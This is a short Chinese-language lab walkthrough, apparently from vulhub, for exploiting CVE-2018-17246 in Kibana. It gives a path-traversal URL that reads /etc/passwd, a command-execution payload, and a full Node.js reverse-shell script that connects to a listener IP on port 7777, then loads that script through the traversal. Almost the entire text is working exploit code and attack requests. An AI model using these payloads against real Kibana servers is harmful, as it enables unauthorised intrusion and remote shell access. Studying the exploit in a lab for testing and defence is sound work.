影响版本
ElasticSearch Kibana < 6.4.3
ElasticSearch Kibana < 5.6.13搭建过程
cd vulhub-master/kibana/CVE-2018-17246
docker-compose up -d
验证POC
http://your-ip:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
漏洞利用
任意命令执行
echo 'export default {asJson: function() {return require("child_process").execSync("id").toString()}}' > /tmp/vulhub.js
使用漏洞反弹shell
创建反弹shell的js文件,并上传至服务器
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(7777, "192.168.229.128", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();Kali使用nc进行监听
然后访问反弹shell文件
http://192.168.229.132:5601/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../tmp/shell.js
即可得到shell
